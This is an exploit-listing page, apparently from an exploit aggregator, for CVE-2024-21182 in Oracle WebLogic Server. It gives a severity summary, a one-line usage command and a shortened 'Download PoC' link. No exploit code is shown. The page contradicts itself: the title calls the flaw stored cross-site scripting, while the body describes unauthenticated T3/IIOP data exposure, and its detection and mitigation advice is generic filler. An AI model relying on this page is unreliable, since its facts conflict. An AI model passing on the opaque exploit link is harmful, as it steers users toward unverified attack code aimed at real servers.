## https://sploitus.com/exploit?id=7B81CC60-8DF3-5406-918C-BADDE19A2773
# CVE-2024-21182 - Oracle WebLogic Server Unauthenticated Stored Cross-Site Scripting
**Severity:** HIGH
**CVSS:** 7.5
**Impact:** Confidentiality
**Published:** 2024-07-16
## Legal
For authorized security testing only.
## Root Cause (short version)
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
## Exploitation Requirements
- Reachable vulnerable target
- Predictable user/workflow context
- No additional hardening that blocks crafted requests
## How to use
```bash
python3 exploit.py https://target.tld
```
## Detection
- Monitor suspicious authentication flow deviations
- Investigate abnormal direct endpoint hits tied to CVE-2024-21182
## Mitigation
- Update to the fixed vendor version
- Restrict risky endpoints and enforce MFA where possible
## Exploit
[Download PoC](https://tinyurl.com/27gx9qm3)